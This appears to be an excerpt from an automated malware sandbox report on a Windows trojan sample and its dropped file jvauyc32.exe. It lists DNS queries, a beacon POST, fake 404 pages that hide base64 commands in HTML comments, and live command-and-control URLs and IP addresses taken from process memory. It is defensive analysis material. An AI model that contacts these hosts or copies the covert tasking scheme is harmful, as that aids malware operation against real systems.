        Source: global trafficDNS traffic detected: DNS query: civet.ziphaze.com
        Source: global trafficDNS traffic detected: DNS query: ns2.fr.dns.d0wn.biz
        Source: global trafficDNS traffic detected: DNS query: ns1.sg.dns.d0wn.biz
        Source: global trafficDNS traffic detected: DNS query: ns1.nl.dns.d0wn.biz
        Source: unknownHTTP traffic detected: POST /n/tasks.php HTTP/1.0Host: n.ddnsgratis.com.brUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0Content-type: application/x-www-form-urlencodedCookie: auth=bc00595440e801f8a5d2a2ad13b9791bContent-length: 12Data Raw: 5f 77 76 3d 5a 57 35 30 5a 58 49 3d 0a Data Ascii: _wv=ZW50ZXI=
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:42:26 GMTServer: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.14X-Powered-By: PHP/5.6.14Status: 404 Not FoundContent-Length: 357Content-Type: text/html; charset=utf8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 2f 74 61 73 6b 73 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 0d 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 3c 21 2d 2d 2d 63 33 56 6a 59 32 56 7a 63 77 3d 3d 2d 2d 2d 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /n/tasks.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html><!---c3VjY2Vzcw==--->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:43:13 GMTServer: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.14X-Powered-By: PHP/5.6.14Status: 404 Not FoundContent-Length: 377Content-Type: text/html; charset=utf8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 2f 74 61 73 6b 73 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 0d 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 3c 21 2d 2d 2d 4d 54 51 77 4d 54 41 33 4e 6a 4d 34 4e 6a 63 78 4e 54 63 32 4e 69 4e 79 59 58 52 6c 49 44 55 6a 2d 2d 2d 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /n/tasks.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html><!---MTQwMTA3NjM4NjcxNTc2NiNyYXRlIDUj--->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:43:59 GMTServer: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.14X-Powered-By: PHP/5.6.14Status: 404 Not FoundContent-Length: 377Content-Type: text/html; charset=utf8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 2f 74 61 73 6b 73 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 0d 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 3c 21 2d 2d 2d 4d 54 51 77 4d 54 41 33 4e 6a 4d 34 4e 6a 63 78 4e 54 63 32 4e 69 4e 79 59 58 52 6c 49 44 55 6a 2d 2d 2d 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /n/tasks.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html><!---MTQwMTA3NjM4NjcxNTc2NiNyYXRlIDUj--->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:44:47 GMTServer: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.14X-Powered-By: PHP/5.6.14Status: 404 Not FoundContent-Length: 377Content-Type: text/html; charset=utf8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 2f 74 61 73 6b 73 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 0d 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 3c 21 2d 2d 2d 4d 54 51 77 4d 54 41 33 4e 6a 4d 34 4e 6a 63 78 4e 54 63 32 4e 69 4e 79 59 58 52 6c 49 44 55 6a 2d 2d 2d 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /n/tasks.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html><!---MTQwMTA3NjM4NjcxNTc2NiNyYXRlIDUj--->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 18 Oct 2024 10:45:33 GMTServer: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.14X-Powered-By: PHP/5.6.14Status: 404 Not FoundContent-Length: 377Content-Type: text/html; charset=utf8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 2f 74 61 73 6b 73 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 0d 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 3c 21 2d 2d 2d 4d 54 51 77 4d 54 41 33 4e 6a 4d 34 4e 6a 63 78 4e 54 63 32 4e 69 4e 79 59 58 52 6c 49 44 55 6a 2d 2d 2d 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /n/tasks.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html><!---MTQwMTA3NjM4NjcxNTc2NiNyYXRlIDUj--->
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1714018983.00000000042DA000.00000004.00000010.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1711811568.00000000010BE000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000003.1559539184.000000000089B000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4013785949.0000000000953000.00000004.10000000.00040000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.1719947674.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmp, jvauyc32.exe, 00000018.00000002.2148956614.0000000000923000.00000004.10000000.00040000.00000000.sdmp, jvauyc32.exe, 00000018.00000002.2159163080.0000000000F7E000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif
        Source: jvauyc32.exe, 0000000A.00000002.4063142769.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2086807690.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?18a856f=77566029
        Source: jvauyc32.exe, 0000000A.00000003.2086807690.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?22aca7d=145435124
        Source: jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?22aca7d=1454351240
        Source: jvauyc32.exe, 0000000A.00000002.4063142769.00000000013AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?22aca7d=145435124L
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?270a0145=-2040263502
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?270a0145=-2040263502_
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?27fe3552=-1611082424
        Source: jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?2945db31=1244584328
        Source: jvauyc32.exe, 0000000A.00000003.3587177959.000000000669A000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?2b436842=725837890
        Source: jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?2b436842=7258378902
        Source: jvauyc32.exe, 0000000A.00000003.3587177959.000000000669A000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?2be56550=-1225394912
        Source: jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?2c5425f=92964030
        Source: jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?2c5425f=92964030=
        Source: jvauyc32.exe, 0000000A.00000003.2086807690.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?2c5425f=92964030M
        Source: jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?2c5425f=92964030V
        Source: jvauyc32.exe, 0000000A.00000003.3703628262.000000000669A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?2e54b34b=777302859
        Source: jvauyc32.exe, 0000000A.00000003.3703628262.000000000669A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?308e5400=-443594752
        Source: jvauyc32.exe, 0000000A.00000002.4063142769.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?3337cce9=1720097375
        Source: jvauyc32.exe, 0000000A.00000003.2086807690.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?352e846=390355434
        Source: jvauyc32.exe, 0000000A.00000003.2043123280.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?352e846=3903554340
        Source: jvauyc32.exe, 0000000A.00000003.2043123280.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?352e846=390355434=
        Source: jvauyc32.exe, 0000000A.00000002.4063142769.00000000013AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?352e846=390355434a
        Source: jvauyc32.exe, 0000000A.00000002.4063142769.00000000013AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?3ff2df5=201165279
        Source: jvauyc32.exe, 0000000A.00000002.4063142769.00000000013AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?542972c=882501560
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.0000000000962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?74d2bd=76561250
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.0000000000962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?74d2bd=76561250eg
        Source: jvauyc32.exe, 0000000A.00000003.2009490304.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.1816216518.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2086807690.0000000001456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?7d519a=82128900A
        Source: jvauyc32.exe, 0000000A.00000003.2009490304.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2460098695.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.1816216518.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2331666794.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2938885386.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2847114789.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2769552015.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2524944921.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2407819962.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2086807690.0000000001456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?7d519a=82128900K
        Source: jvauyc32.exe, 0000000A.00000002.4063142769.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2086807690.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?7d519a=82128900M
        Source: jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?eaa8c1=153786250
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.000000000094F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.0000000000962000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1714018983.00000000042DA000.00000004.00000010.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1715429645.0000000005F95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?fea286=16687750
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.0000000000962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?fea286=166877501
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.0000000000962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?fea286=166877507
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.0000000000962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?fea286=16687750W
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.0000000000962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?fea286=16687750Y
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.0000000000962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?fea286=16687750g
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.0000000000962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gif?fea286=16687750w
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1714018983.00000000042DA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://190.120.227.91:8080/sobakavolos.gifK
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712636020.00000000013F9000.00000004.00000010.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1706613049.0000000000A43000.00000004.10000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1711811568.00000000010BE000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000003.1559539184.000000000089B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4013785949.0000000000953000.00000004.10000000.00040000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.1719947674.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmp, jvauyc32.exe, 00000018.00000002.2148956614.0000000000923000.00000004.10000000.00040000.00000000.sdmp, jvauyc32.exe, 00000018.00000002.2159163080.0000000000F7E000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: http://89.11
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.119.67.154/testo5/
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.119.67.154/testo5/http://kukutrustnet777.info/home.gifhttp://kukutrustnet888.info/home.gif
        Source: explorer.exe, 00000017.00000000.1811548975.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1811548975.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
        Source: svchost.exe, 00000015.00000000.1746047400.000001F0FD7A3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.4069997805.000001F0FD7A3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
        Source: explorer.exe, 00000017.00000000.1811548975.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1811548975.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
        Source: svchost.exe, 00000015.00000000.1746047400.000001F0FD7A3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.4069997805.000001F0FD7A3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
        Source: explorer.exe, 00000017.00000000.1811548975.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1811548975.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
        Source: svchost.exe, 00000015.00000000.1746047400.000001F0FD7A3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.4069997805.000001F0FD7A3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
